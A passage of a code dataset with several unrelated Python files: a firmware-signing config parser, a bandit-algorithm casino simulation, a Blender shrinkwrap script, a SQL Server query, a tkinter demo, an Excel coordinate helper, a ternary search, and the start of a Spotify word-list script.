defines.XML_CLASSNAME_GEN)\n\n def transfer_from_node_to_obj(self, node, obj, structure, structure_parent):\n return self.transfer(node,\n obj,\n structure,\n structure_parent,\n self.obj_module,\n defines.OBJ_CLASSNAME_GEN)\n\n @property\n def chipset(self):\n \"\"\"\n :returns: Name of the chipset.\n :rtype: str\n \"\"\"\n return self.root.metadata.chipset\n\n @property\n def version(self):\n \"\"\"\n :returns: Version of the config file.\n :rtype: str\n \"\"\"\n return self.root.metadata.version\n\n @property\n def config_data(self):\n \"\"\"\n :returns: Config object\n :rtype: obj\n \"\"\"\n return self.root\n\n @property\n def sign_id_list(self):\n \"\"\"\n :returns: sign_ids available in the config file\n :rtype: list[str]\n \"\"\"\n return [image.sign_id for image in self._get_image_list()]\n\n def get_sign_id_for_image_name(self, image_name):\n \"\"\"\n :param str image_name: Image name for which the sign id is needed.\n :returns: sign_id corresponding to the image_name provided.\n :rtype: str\n :raises RuntimeError: If None or multiple sign_ids are found for the\n given image_name.\n \"\"\"\n assert isinstance(image_name, str)\n\n # Look for all the matching sign ids\n sign_ids_found = []\n for image in self._get_image_list():\n if image.name and image.name.lower() == image_name.lower():\n sign_ids_found.append(image.sign_id)\n\n # Raise error if None or multiple sign ids are found\n if len(sign_ids_found) == 0:\n raise RuntimeError('Sign Id not found for image name: ' + image_name)\n elif len(sign_ids_found) > 1:\n raise RuntimeError('Multiple sign ids found for image name: ' + image_name + '\\n'\n ' ' + 'Sign Ids: ' + str(sign_ids_found))\n else:\n return sign_ids_found[0]\n\n def get_config_for_sign_id(self, sign_id):\n \"\"\"\n :param str sign_id: Sign id for which the config block is needed.\n :returns: config block 
corresponding to the sign_id provided.\n :rtype: obj\n :raises RuntimeError: If sign_id does not correspond to a config block.\n \"\"\"\n assert isinstance(sign_id, str)\n for image in self._get_image_list():\n if image.sign_id == sign_id:\n return image\n raise RuntimeError('Config block not found for sign id: ' + sign_id)\n\n def get_hmac_params_from_config(self, sign_id):\n \"\"\"\n :returns: A HMAC object with the HMAC parameters from the config file.\n :rtype: obj\n \"\"\"\n sign_id_config_block=self.get_config_for_sign_id(sign_id)\n msm_part = self.root.signing.default_attributes.msm_part\n oem_id = self.root.signing.default_attributes.oem_id\n model_id= self.root.signing.default_attributes.model_id\n msm_id = msm_part + oem_id[2:] + model_id[2:]\n msm_id = int(msm_id,16)\n sw_id = sign_id_config_block.signing_attributes_overrides.sw_id\n sw_id = int(sw_id,16)\n return HmacParams(msm_id,sw_id)\n\n def _get_image_list(self):\n \"\"\"\n :returns: list of image objects from the config file\n :rtype: list[obj]\n \"\"\"\n return self.root.images_list.image\n\n def _get_parsegen_image_type_list(self):\n \"\"\"\n :returns: list of image_type objects from the config file\n :rtype: list[obj]\n \"\"\"\n return self.root.parsegen.image_types_list.image_type\n\n def _get_signing_local_cert_config_list(self):\n \"\"\"\n :returns: list of cert_config objects from the config file\n :rtype: list[obj]\n \"\"\"\n return self.root.signing.signer_attributes.local_signer_attributes.cert_configs_list.cert_config\n\n def _set_signing_local_cert_config_list(self, cert_config_nodes_list):\n \"\"\"\n :param cert_config_nodes_list: list[auto_gen_xml_config.complex_cert_config]\n \"\"\"\n assert isinstance(cert_config_nodes_list, list)\n for cert_config in cert_config_nodes_list:\n assert isinstance(cert_config, self.config_module.complex_cert_config)\n self.root.signing.signer_attributes.local_signer_attributes.cert_configs_list.cert_config = cert_config_nodes_list\n\n @classmethod\n def get_chipset_from_file(self, path):\n return ConfigParser(path).chipset\n\n\n#------------------------------------------------------------------------------\n# Restrict all import\n#------------------------------------------------------------------------------\n__all__ = ['ConfigDir',\n 'ConfigParser',\n 'defines',\n 'auto_gen_obj_config']\n","repo_name":"bcyj/android_tools_leeco_msm8996","sub_path":"common/scripts/SecImage/sectools/features/isc/cfgparser/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16669,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"30692064224","text":"import random\nimport numpy as np\nfrom scipy.stats import beta\nfrom memoization import cached\n\n# there are N casinos\n# each casino_i initially has 0 arms, however\n# each casino_i is equipted with a slot-machine maker \n# assume the slot machine maker is Unif(a_i, opt_i)\n# where a_i < opt_i < 1\n\n# you can take 2 kinds of actions:\n# a) go to a casino and pull from an existing machine.\n# the machine give a 0,1 outcome from Bernuli(mu)\n# where mu is the hidden parameter of the machine\n#\n# b) go to a casino, and pull from a new machine\n# the casino first sample a new machine mu_new ~ Unif(a_i, opt_i)\n# this machine is added to the casino permanently,\n# you receive a 0,1 outcome from Bernuli(mu_new)\n\n# your goal is to find 1 good slot machine per casino, specifically\n# give an online algorithm that, after a number of interactions\n# return one slot 
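The validation in the secimage record above leans on get_dups_in_list(), imported from sectools.common.utils.c_misc but not shown in this file. A hedged, functionally equivalent sketch of what those checks expect it to return:

from collections import Counter

def get_dups_in_list(values):
    # every value that occurs more than once, reported once each,
    # in first-seen order (Counter preserves insertion order)
    return [value for value, count in Counter(values).items() if count > 1]

assert get_dups_in_list(["sbl1", "sbl2", "sbl1"]) == ["sbl1"]
assert get_dups_in_list(["appsbl", "tz"]) == []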
machine from each casino: mu_1 ... mu_10\n# minimizing the total \"regret\" :\n# total_regret = (opt_1 - mu_1) + ... + (opt_10 - mu_10)\n\n# ======== THE ENVIRONMENT MODEL =========\n\nN = 3\nBudget = 16 * N\n\n# make N casinos, each casino_i paramterized by (a_i, opt_i)\ndef make_casino_params():\n def make_pair():\n a_i = random.random()\n opt_i = random.random()\n if a_i < opt_i:\n return a_i, opt_i\n else:\n return make_pair()\n return [make_pair() for _ in range(N)]\n\nclass CasEnv:\n def __init__(self, casino_params):\n self.casino_params = casino_params\n self.casinos = None\n\n # cache the result of sampling new arms to casinos\n self.casino_cache = dict()\n self.arm_cache = dict()\n\n def reset(self):\n # N empty casinos\n self.casinos = [[] for _ in range(N)]\n # initial observations at each casino\n self.ob = [[] for _ in range(N)]\n return self.ob\n\n def step(self, action):\n cas_id, arm_id = action\n assert arm_id in range(-1, len(self.casinos[cas_id])), \"ARM NO EXIST CYKA\"\n # -1 means sample new arm, so we sample one\n if arm_id == -1:\n\n # we use cache so the arms of the casino are consistent across different runs of the env as the first time\n # the casino cache id is the casino id, and the number of arm being tried out\n casino_cache_key = (cas_id, len(self.casinos[cas_id]))\n\n if casino_cache_key not in self.casino_cache:\n to_add = random.uniform(*self.casino_params[cas_id])\n self.casino_cache[casino_cache_key] = to_add\n\n new_arm_mu = self.casino_cache[casino_cache_key]\n self.ob[cas_id].append([])\n self.casinos[cas_id].append(new_arm_mu)\n\n # pull from the selected arm (-1 works nicely here lol)\n arm_result = 1 if random.random() < self.casinos[cas_id][arm_id] else 0\n self.ob[cas_id][arm_id].append(arm_result)\n return self.ob\n\n def check_answer(self, guess):\n total_regret = 0\n for cas_id, arm_id in enumerate(guess):\n guessed_arms_mu = 0\n if arm_id in range(len(self.casinos[cas_id])):\n guessed_arms_mu = self.casinos[cas_id][arm_id]\n opt = self.casino_params[cas_id][1]\n regret = opt - guessed_arms_mu\n total_regret += regret\n return total_regret\n\n\n# ========= A Naive Policy ==========\nclass NaivePolicy:\n\n # for faster computation, cache the state-action pair\n def __init__(self):\n self.cache = dict()\n\n # if a casino is empty, sample a new arm\n # otherwise, randomly pull an existing arm or get a new arm\n #@cached \n def act(self, observations):\n for cas_id, cas in enumerate(observations):\n if len(cas) == 0:\n return (cas_id, -1)\n rand_id = random.choice([_ for _ in range(N)])\n rand_arm = random.choice([_ for _ in range(-1, len(observations[rand_id]))]) \n return (rand_id, rand_arm)\n\n def guess(self, observations):\n ret = []\n def arm_quality(arm_ob):\n return sum(arm_ob) / len(arm_ob)\n for cas_ob in observations:\n arm_qual = [arm_quality(arm_ob) for arm_ob in cas_ob]\n ret.append(np.argmax(arm_qual))\n return ret\n\n# ========= A Tile Strategy ===========\nclass TilePolicy(NaivePolicy):\n # always act on the casino with the least number of observations\n # use sqrt rule for allocate new arm, otherwise spread out evenly\n #@cached\n def act(self, observations): \n interaction_per_cas = [sum([len(arm_ob) for arm_ob in cas_ob]) for cas_ob in observations]\n cas_id = np.argmin(interaction_per_cas)\n cas_ob = observations[cas_id]\n cas_interactions = interaction_per_cas[cas_id]\n if len(cas_ob) <= np.sqrt(cas_interactions):\n return (cas_id, -1)\n else:\n poor_arm_id = np.argmin([len(arm_ob) for arm_ob in cas_ob])\n return (cas_id, 
poor_arm_id)\n\n\n# ========= A Jank Strategy ==========\nclass JankPolicy(NaivePolicy):\n # each casino fixed budget, within casino do ucb\n #@cached\n def act(self, observations):\n interaction_per_cas = [sum([len(arm_ob) for arm_ob in cas_ob]) for cas_ob in observations]\n cas_id = np.argmin(interaction_per_cas)\n cas_ob = observations[cas_id]\n cas_interactions = interaction_per_cas[cas_id]\n if len(cas_ob) <= np.sqrt(cas_interactions):\n return (cas_id, -1)\n else:\n ucbs = []\n for arm_ob in cas_ob:\n a= sum(arm_ob) + 1\n b = len(arm_ob) - a + 1\n mean, var = beta.stats(a, b, moments='mv')\n ucbs.append(mean + np.sqrt(var))\n return (cas_id, np.argmax(ucbs))\n\n# ========== Interacting Between Env and Policy ===========\ndef roll_out(env, policy):\n obs = env.reset()\n for n in range(Budget):\n action = policy.act(obs)\n obs = env.step(action)\n guess = policy.guess(obs)\n return env.check_answer(guess)\n\nif __name__ == '__main__':\n policies = [NaivePolicy(), TilePolicy(), JankPolicy()]\n cums = [0 for _ in policies]\n for i in range(1000):\n cas_par = make_casino_params()\n env = CasEnv(cas_par)\n for j in range(len(cums)):\n policy = policies[j]\n regret = roll_out(env, policy)\n cums[j] += regret\n\n\n print (f\"regret {cums}\")","repo_name":"samacqua/ARC-Turks","sub_path":"python_bandit_formulation/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":6407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5145395222","text":"#!/usr/bin/env python3\n\n# bpy-run-from-blender fix.\n# Assumes that commandline arguments are\n# sys.argv[0] = path-to-blender\n# sys.argv[1] = '-b'\n# sys.argv[2] = '-P'\n# sys.argv[3] = path-to-this-script\nimport sys\nimport os\nif sys.argv[0].split('.exe')[0].endswith('blender') and sys.argv[1] == '-b' and sys.argv[2] == '-P':\n origin_script_working_directory = os.path.split(sys.argv[3])[0]\n print(\"setting working directory for imports: '%s'\"%origin_script_working_directory)\n sys.path.insert(0, origin_script_working_directory)\n argv = sys.argv[3:]\nelse:\n argv = sys.argv\n\n# re-run self from within blender if bpy not available.\n# lets you run this script directly, while really running it from within blender's python install.\n# note: the code above is to fix imports (re-add the local working directory to the python search path)\n# when this happens\nfrom run_bpy import run_self\nrun_self()\n\n# End header...\nimport bpy\n\ndef clear_all_objects ():\n print(\"deleting %s objects: %s\"%(\n len(bpy.context.selected_objects),\n bpy.context.selected_objects))\n bpy.ops.object.delete()\n\ndef import_and_join_obj (path, join_into = None):\n print(\"%s objects selected\"%(len(bpy.context.selected_objects)))\n print(\"importing '%s'\"%path)\n result = bpy.ops.import_scene.obj(filepath=path)\n if 'FINISHED' not in result:\n raise Exception(\"Obj import failed: '%s'\"%path)\n print(\"imported %s objects\"%(len(bpy.context.selected_objects)))\n ctx = bpy.context.copy()\n ctx['active_object'] = join_into or bpy.context.selected_objects[0]\n ctx['selected_objects'] = bpy.context.selected_objects\n bpy.ops.object.join(ctx)\n print(\"joined into %s\"%ctx['active_object'])\n return ctx['active_object']\n\ndef apply_shrinkwrap (src, dst, subdivisions):\n print(\"Creating modifiers...\")\n subdiv_modifier = dst.modifiers.new(name='subdiv', type='SUBSURF')\n subdiv_modifier.levels = subdivisions\n subdiv_modifier.render_levels = subdivisions\n\n shrinkwrap_modifier = 
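JankPolicy above scores each arm by a Beta-posterior mean plus one standard deviation. A standalone sketch of that index; note the original computes b = len(arm_ob) - a + 1, which reaches zero for an all-success arm, so this sketch uses the standard add-one (Laplace) posterior instead:

import numpy as np
from scipy.stats import beta

def ucb_index(arm_observations):
    scores = []
    for obs in arm_observations:  # obs is a list of 0/1 pull outcomes
        successes = sum(obs)
        a = successes + 1
        b = len(obs) - successes + 1
        mean, var = beta.stats(a, b, moments="mv")
        scores.append(mean + np.sqrt(var))
    return int(np.argmax(scores))

print(ucb_index([[1, 0, 1], [1, 1, 1, 1], [0]]))  # index of the most promising arm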
dst.modifiers.new(name='shrinkwrap', type='SHRINKWRAP')\n shrinkwrap_modifier.target = src\n shrinkwrap_modifier.wrap_method = \"PROJECT\"\n shrinkwrap_modifier.cull_face = \"OFF\"\n shrinkwrap_modifier.use_positive_direction = True\n shrinkwrap_modifier.use_negative_direction = True\n\n print(\"Applying modifiers...\")\n bpy.context.scene.objects.active = dst\n bpy.ops.object.modifier_apply(modifier='subdiv')\n bpy.ops.object.modifier_apply(modifier='shrinkwrap')\n print(\"Done\")\n return dst\n\ndef delete_everything_but_object (obj):\n bpy.ops.object.select_all(action='SELECT')\n obj.select = False\n bpy.ops.object.delete()\n obj.select = True\n return obj\n\ndef export_obj (obj, path):\n delete_everything_but_object(obj)\n bpy.ops.export_scene.obj(\n filepath=path,\n use_materials=False,\n keep_vertex_order=True,\n )\n print(\"Done: exported to '%s'\"%path)\n\ndef execute_shrinkwrap (import_path, export_path, subdivisions):\n clear_all_objects()\n obj = import_and_join_obj(import_path)\n result = bpy.ops.mesh.primitive_cube_add()\n cube = bpy.context.active_object\n\n print(\"Imported object = %s\"%obj) # joined obj components\n print(\"Target object = %s\"%cube)\n apply_shrinkwrap(src=obj, dst=cube, subdivisions=subdivisions)\n\n basedir = os.path.split(export_path)[0]\n if basedir and not os.path.exists(basedir):\n os.makedirs(basedir)\n export_obj(cube, export_path)\n\nif __name__ == '__main__':\n if len(argv) < 3:\n print(\"Usage: %s .obj .obj []\"%(args[0]))\n\n DEFAULT_SUBDIVISIONS = 2\n execute_shrinkwrap(\n import_path = argv[1],\n export_path = argv[2],\n subdivisions = DEFAULT_SUBDIVISIONS if len(argv) < 4 else int(argv[3])\n )\n\n # OBJ_IMPORT_PATH = \"/Users/semery/projects/shape-net-utils/car_models/ShapeNetCore.v2/02958343/371c5e74c66d22d451973ec97171fea3/models/model_normalized.obj\"\n # OBJ_EXPORT_PATH = \"/Users/semery/projects/shape-net-utils/shrinkwrap-exports/02958343-371c5e74c66d22d451973ec97171fea3.obj\"\n\n # execute_shrinkwrap(OBJ_IMPORT_PATH, OBJ_EXPORT_PATH, subdivisions = 2)\n","repo_name":"SeijiEmery/shape-net-utils","sub_path":"naive_shrinkwrap.py","file_name":"naive_shrinkwrap.py","file_ext":"py","file_size_in_byte":4223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74923473067","text":"import pypyodbc as odbc # pip install pypyodbc\nimport numpy as np # pip install numpy\n\nDRIVER_NAME = \"SQL SERVER\"\nSERVER_NAME = \"LAPTOP-KBAD6AQA\\SQLEXPRESS\"\nDATABASE_NAME = 'Netflix'\n\nconnection_string = f\"\"\"\n DRIVER={{{DRIVER_NAME}}};\n SERVER={{{SERVER_NAME}}};\n DATABASE={{{DATABASE_NAME}}};\n Trust_Connection=yes;\n\"\"\"\n\nconn = odbc.connect(connection_string)\nprint(conn)\n\ntry:\n # Establish a connection\n conn = odbc.connect(connection_string)\n\n # Create a cursor\n cursor = conn.cursor()\n\n # Example query\n query = \"SELECT * FROM Streaming_Data\"\n cursor.execute(query)\n\n # Fetch and print results\n rows = cursor.fetchall()\n\n # Convert tuples to numpy arrays\n arrays = [np.array(row) for row in rows]\n\n # Remove elements at indices 1, 2, and 3 from each array\n modified_arrays = [np.delete(arr, [1, 2, 3]) for arr in arrays]\n\n # Columns still within a row\n print(\"User_ID index 0, Duration_Watched_Minutes index 1, Genre index 2, Country index 3, Age index 4, Gender index 5, Subscription_Status index 6, Ratings index 7, Languages index 8, Device_Type index 9, Location index 10, Playback_Quality index 11, Interaction_Events index 12\")\n\n # Print the modified arrays\n for 
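The Blender script above calls run_bpy.run_self(), whose source is not included in this record. A hedged sketch of the idea as the header comments describe it (an assumption, not the repo's actual implementation): if bpy is unavailable, re-launch the script through Blender's bundled interpreter.

import subprocess
import sys

def run_self(blender_binary="blender"):
    try:
        import bpy  # noqa: F401 -- already running inside Blender
        return
    except ImportError:
        pass
    # -b runs Blender headless, -P executes the given Python script
    subprocess.check_call([blender_binary, "-b", "-P", sys.argv[0]] + sys.argv[1:])
    sys.exit(0)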
modified_arr in modified_arrays[:10]:\n print(modified_arr)\n\nexcept odbc.Error as e:\n print(f\"Error: {e}\")\n\nfinally:\n # Close the connection\n if conn:\n conn.close()","repo_name":"HamiltonWilliamsBusiness/Netflix-Data-Insights","sub_path":"StreamingApplication.py","file_name":"StreamingApplication.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"8459798118","text":"from tkinter import *\n\nroot = Tk()\nroot.title(\"Nado GUI\") # set the GUI window title\n\nbtn1 = Button(root, text=\"버튼1\")\nbtn1.pack() # place the button\n\nbtn2 = Button(root, padx=5, pady=10, text=\"버튼2\")\nbtn2.pack()\n\nbtn3 = Button(root, padx=10, pady=5, text=\"버튼3\") # padx = horizontal padding, pady = vertical padding (size adapts to content)\nbtn3.pack()\n\nbtn4 = Button(root, width=10, height=3, text=\"버튼4\") # set the button's width and height (fixed size)\nbtn4.pack()\n\nbtn5 = Button(root, highlightbackground='yellow', text=\"버튼5\") # foreground (text color), background (background color)\nbtn5.pack()\n\nphoto = PhotoImage(file=\"gui_basic/img.png\")\nbtn6 = Button(root, image=photo)\nbtn6.pack()\n\ndef btncmd():\n print(\"버튼이 클릭되었어요.\")\nbtn7 = Button(root, text=\"동작하는 버튼\", command=btncmd)\nbtn7.pack()\n\n\n\n\n\nroot.mainloop()\n","repo_name":"songyi-park/my-first-practice","sub_path":"gui_basic/2_button.py","file_name":"2_button.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"13817306936","text":"class CoordonnéesExcel:\n\n def __init__(self, fichier, feuille, celulle1, celulle2):\n self.feuille = feuille\n self.celulle1 = celulle1\n self.celulle2 = celulle2\n self.fichier = fichier\n self.ws = fichier.Sheets(feuille)\n self.liste = []\n self.itération = -1\n i = 2\n while self.ws.Range(self.celulle1 + str(i)).Value != None:\n self.liste.append([\n self.ws.Range(self.celulle1 + str(i)).Value,\n self.ws.Range(self.celulle2 + str(i)).Value])\n i += 1\n\n\n def get_coordonnées(self):\n self.itération += 1\n try:\n c = self.liste[self.itération]\n except:\n print('Erreur: Le nombre maxi de coordonnées est atteint')\n c = False\n finally:\n return c\n\n\n\n\n def get_tout(self):\n return self.liste\n\n\n\nclass CoordonnéesEcran:\n profile = [\n 'Khalil']\n dictio = {\n 'Espace ajouter': [\n (0, 0),\n [\n 'Dans l\\'activité: gérer les données techniques placez-vous sur: l espace blanc à droite du boutton ajouter, cliquez sur échape pour enregistrer']],\n 'Dossier': [\n (0, 0),\n [\n 'Basculer au bas de la page et placez-vous sur le dossier, cliquez sur échape pour enregister']],\n 'Composant': [\n (0, 0),\n [\n 'Basculer au bas de la page et Cliquez sur le dossier et placez-vous sur: ajouter un composant, cliquez sur échape pour enregister']],\n 'Dossier2': [\n (0, 0),\n [\n 'Apres le rajout de composant basculer au bas de la page et placez-vous sur le dossier, cliquez sur échape pour enregister']],\n 'ChoixDt': [\n (0, 0),\n [\n 'Basculer au bas de la page et Cliquez sur le dossier et placez-vous sur: importer des DT, cliquez sur échape pour enregister']],\n 'Sans Insert': [\n (0, 0),\n [\n 'Au niveau du rajout de modele de DT placez-vous sur le petit dossier à SANS INSERT, cliquez sur échape pour enregister']],\n 'Insert': [\n (0, 0),\n [\n 'Au niveau du rajout de modele de DT placez-vous sur le petit dossier à INSERT, cliquez sur échape pour enregister']],\n 'Operation': [\n (0, 0),\n [\n 'Basculez au bas de la page et placez-vous sur l opération info génerales, cliquez sur échape pour enregister']],\n 
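A quick standalone illustration of the np.delete() call in the database record above: removing index positions 1-3 from a 1-D row keeps the remaining fields in order (the row values below are made up):

import numpy as np

row = np.array(["U1", "drop_a", "drop_b", "drop_c", "Drama", "US"])
kept = np.delete(row, [1, 2, 3])
print(kept)  # ['U1' 'Drama' 'US']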
'Operation modif': [\n (0, 0),\n [\n 'Cliquer sur l operation info generales et placez-vous sur modifier l operation, cliquez sur échape pour enregister']],\n 'Operation sans ins': [\n (0, 0),\n [\n 'Supprimer une operation, basculez au bas de la page et placez-vous sur l opération info génerales, cliquez sur échape pour enregister']],\n 'Operation sans ins modif': [\n (0, 0),\n [\n 'Après avoir supprimé un opération, liquer sur l operation info generales et placez-vous sur modifier l operation, cliquez sur échape pour enregister']],\n 'Commentaire': [\n (0, 0),\n [\n 'Ouvrez une opération, basculez au bas et placez-vous sur l espace de commentaire, cliquez sur échape pour enregister']],\n 'Espace Valider': [\n (0, 0),\n [\n 'Ouvrez une opération, basculez au bas et placez-vous sur l espace à gauche du button valider, cliquez sur échape pour enregister']],\n 'Fermer': [\n (0, 0),\n [\n 'Basculez au bas de la page et placez-vous sur le boutton fermer, cliquez sur échape pour enregister']] }","repo_name":"KhalBorf/Saisie-Auto","sub_path":"Coordonnées.py","file_name":"Coordonnées.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5168375986","text":"# Ternary search function\ndef TernarySearch(l, r, key, arr): \n\n if (r >= l): \n\n # Find the mid1 and mid2 \n mid1 = l + (r - l) //3\n mid2 = r - (r - l) //3\n\n # Check if key is present at mid1 \n if (arr[mid1] == key):\n return mid1 \n\n # Check if key is present at mid2\n elif (arr[mid2] == key):\n return mid2 \n \n # Check if key is present before mid1\n elif (key < arr[mid1]): \n return TernarySearch(l, mid1 - 1, key, arr) \n \n # Check if key is present after mid2 \n elif (key > arr[mid2]): \n return TernarySearch(mid2 + 1, r, key, arr) \n \n # Check if key is present between mid1 and mid2\n else: \n return TernarySearch(mid1 + 1, mid2 - 1, key, arr) \n \n # key is not present in the array \n return -1\n\nn = int(input(\"Enter the number of elements\\n\"))\n\n# Mapping each element of input into integer and making a list of it\n\narr = list(map(int, input(\"Enter {} elements\\n\".format(n)).split()))\n\n# sorting the list\narr.sort()\n\n# assigning the start and end variable\nl = 0\nr = n-1\n\n# Inputting key to be searched from the user\nkey = int(input(\"Enter the key to be found\\n\"))\n\n# Calling the function and assigning index returned to a variable\ni = TernarySearch(l, r, key, arr) \n\n# printing the output\nprint(key, \"is found at index\", i) \n\n\"\"\"input and output\nEnter the number of elements\n4\nEnter 4 elements\n1 3 2 4\nEnter the key to be found\n3\n3 is found at index 2\ntime complexity O(logN)\nspace complexity O(1)\n\n\"\"\"\n\n\n\n","repo_name":"sukritishah15/DS-Algo-Point","sub_path":"Python/ternary_search.py","file_name":"ternary_search.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":958,"dataset":"github-code","pt":"37"} +{"seq_id":"17301556339","text":"import base64\r\nimport datetime\r\nimport os\r\nimport random\r\nimport re\r\n\r\nimport pandas as pd\r\nimport requests\r\nimport spotipy\r\nfrom dotenv import load_dotenv\r\nfrom spotipy.oauth2 import SpotifyOAuth\r\n\r\nload_dotenv()\r\n\r\n# https://englishstudyhere.com/grammar/adjectives/150-most-common-adjectives/\r\nword_list = ['macabre', 'unequaled', 'brawny', 'wicked', 'obscene', 'stupendous', 'spiteful', 'quarrelsome', 'naive',\r\n 'pushy', 'classy', 'crooked', 'obtainable', 'cute', 
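The recursive TernarySearch record above has an iterative counterpart: the same two-probe narrowing expressed with explicit bounds instead of recursion, which some readers find easier to trace:

def ternary_search(arr, key):
    lo, hi = 0, len(arr) - 1
    while lo <= hi:
        mid1 = lo + (hi - lo) // 3
        mid2 = hi - (hi - lo) // 3
        if arr[mid1] == key:
            return mid1
        if arr[mid2] == key:
            return mid2
        if key < arr[mid1]:
            hi = mid1 - 1                 # key lies in the left third
        elif key > arr[mid2]:
            lo = mid2 + 1                 # key lies in the right third
        else:
            lo, hi = mid1 + 1, mid2 - 1   # key lies in the middle third
    return -1

assert ternary_search([1, 2, 3, 4], 3) == 2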
'highfalutin', 'well-groomed', 'smiling', 'previous',\r\n 'excited', 'black-and-white', 'burly', 'vast', 'tense', 'pleasant', 'wasteful', 'noiseless', 'shallow',\r\n 'available', 'dusty', 'gabby', 'barbarous', 'instinctive', 'wandering', 'merciful', 'cumbersome',\r\n 'omniscient', 'maniacal', 'entertaining', 'exciting', 'relieved', 'grotesque', 'heavy', 'amusing',\r\n 'doubtful', 'daffy', 'upbeat', 'picayune', 'versed', 'tasteless', 'hypnotic', 'furry', 'brown',\r\n 'wholesale', 'well-made', 'roasted', 'petite', 'tiresome', 'gentle', 'full', 'grieving', 'abhorrent',\r\n 'unused', 'ludicrous', 'enchanted', 'hesitant', 'rainy', 'sick', 'raspy', 'strong', 'cut', 'angry',\r\n 'cultured', 'wealthy', 'fine', 'political', 'vulgar', 'awake', 'plucky', 'truthful', 'rampant', 'future',\r\n 'uninterested', 'slippery', 'zippy', 'automatic', 'sad', 'ill-informed', 'obnoxious', 'tangy', 'cool',\r\n 'flashy', 'frail', 'swanky', 'crowded', 'sincere', 'unequal', 'equal', 'cooing', 'aboard', 'whole',\r\n 'godly', 'silent', 'acidic', 'excellent', 'dependent', 'beneficial', 'upset', 'sleepy', 'probable',\r\n 'disagreeable', 'narrow', 'waggish', 'super', 'addicted', 'abrasive', 'silent', 'wiry', 'square',\r\n 'healthy', 'thoughtless', 'skinny', 'new', 'vagabond', 'useful', 'onerous', 'humorous', 'weary',\r\n 'grateful', 'acrid', 'resolute', 'zany', 'diligent', 'hard', 'concerned', 'testy', 'accessible',\r\n 'adjoining', 'tight', 'medical', 'enchanting', 'scarce', 'easy', 'ragged', 'luxuriant', 'greedy', 'odd',\r\n 'steady', 'lavish', 'ten', 'ablaze', 'chilly', 'cloistered', 'invincible', 'longing', 'uptight', 'tenuous',\r\n 'miniature', 'good', 'best', 'ambitious', 'white', 'marvelous', 'breezy', 'trite', 'colossal',\r\n 'harmonious', 'cynical', 'depressed', 'fretful', 'tired', 'recondite', 'selective', 'direful', 'economic',\r\n 'clammy', 'agonizing', 'smelly', 'torpid', 'aquatic', 'safe', 'lame', 'kaput', 'old-fashioned', 'fabulous',\r\n 'wise', 'evasive', 'belligerent', 'famous', 'remarkable', 'powerful', 'abashed', 'fragile', 'subsequent',\r\n 'nippy', 'cruel', 'gray', 'moldy', 'unwieldy', 'tacky', 'breakable', 'anxious', 'fanatical', 'volatile',\r\n 'stupid', 'true', 'determined', 'rebel', 'warm', 'massive', 'unruly', 'exotic', 'jumbled', 'splendid',\r\n 'waiting', 'inexpensive', 'sudden', 'hissing', 'rural', 'combative', 'pumped', 'watery', 'second-hand',\r\n 'fixed', 'historical', 'scary', 'royal', 'endurable', 'spotless', 'common', 'bewildered', 'foamy',\r\n 'deadpan', 'guarded', 'enormous', 'friendly', 'soft', 'dry', 'tranquil', 'statuesque', 'snotty', 'dull',\r\n 'chief', 'hallowed', 'tasteful', 'gruesome', 'giddy', 'hushed', 'gaudy', 'subdued', 'cheerful',\r\n 'hard-to-find', 'black', 'madly', 'bawdy', 'bite-sized', 'innocent', 'premium', 'functional',\r\n 'substantial', 'handy', 'wrathful', 'teeny-tiny', 'simplistic', 'abundant', 'ratty', 'wide', 'boorish',\r\n 'mammoth', 'stormy', 'nimble', 'useless', 'red', 'gratis', 'shiny', 'macho', 'daily', 'melodic', 'warlike',\r\n 'piquant', 'unusual', 'wacky', 'tidy', 'bustling', 'lyrical', 'cautious', 'guttural', 'acoustic', 'cute',\r\n 'curved', 'ugly', 'woebegone', 'righteous', 'irate', 'workable', 'ethereal', 'scientific', 'heartbreaking',\r\n 'mountainous', 'used', 'psychotic', 'pastoral', 'amused', 'broken', 'long', 'modern', 'erect', 'capable',\r\n 'obese', 'astonishing', 'elated', 'cluttered', 'fast', 'scared', 'sore', 'lewd', 'itchy', 'willing',\r\n 'enthusiastic', 'flaky', 'sordid', 'difficult', 'magnificent', 'shocking', 'various', 'gamy', 
'proud',\r\n 'unwritten', 'short', 'clean', 'blue', 'aspiring', 'lowly', 'absorbed', 'many', 'big', 'slimy', 'purring',\r\n 'tasty', 'rare', 'industrious', 'graceful', 'wry', 'grouchy', 'plausible', 'cloudy', 'pathetic', 'lively',\r\n 'deep', 'five', 'next', 'dashing', 'windy', 'cagey', 'accurate', 'amazing', 'conscious', 'whimsical',\r\n 'filthy', 'fair', 'supreme', 'aloof', 'lucky', 'eatable', 'soggy', 'erratic', 'simple', 'third', 'labored',\r\n 'violent', 'understood', 'insidious', 'sweltering', 'jealous', 'devilish', 'brief', 'gorgeous', 'ugliest',\r\n 'possessive', 'silky', 'abnormal', 'mushy', 'tense', 'creepy', 'repulsive', 'noisy', 'ripe', 'gigantic',\r\n 'teeny', 'dangerous', 'voracious', 'alluring', 'extra-small', 'sticky', 'shut', 'ill-fated', 'dirty',\r\n 'vengeful', 'afraid', 'grandiose', 'material', 'rustic', 'finicky', 'alcoholic', 'dynamic', 'abortive',\r\n 'elastic', 'strange', 'broad', 'outrageous', 'limping', 'blushing', 'glib', 'nice', 'joyous', 'arrogant',\r\n 'nervous', 'six', 'mixed', 'small', 'embarrassed', 'flat', 'careful', 'ceaseless', 'awful', 'calm',\r\n 'unsightly', 'thin', 'evanescent', 'disillusioned', 'redundant', 'synonymous', 'silly', 'worried',\r\n 'heavenly', 'wide-eyed', 'periodic', 'average', 'towering', 'bouncy', 'solid', 'smoggy', 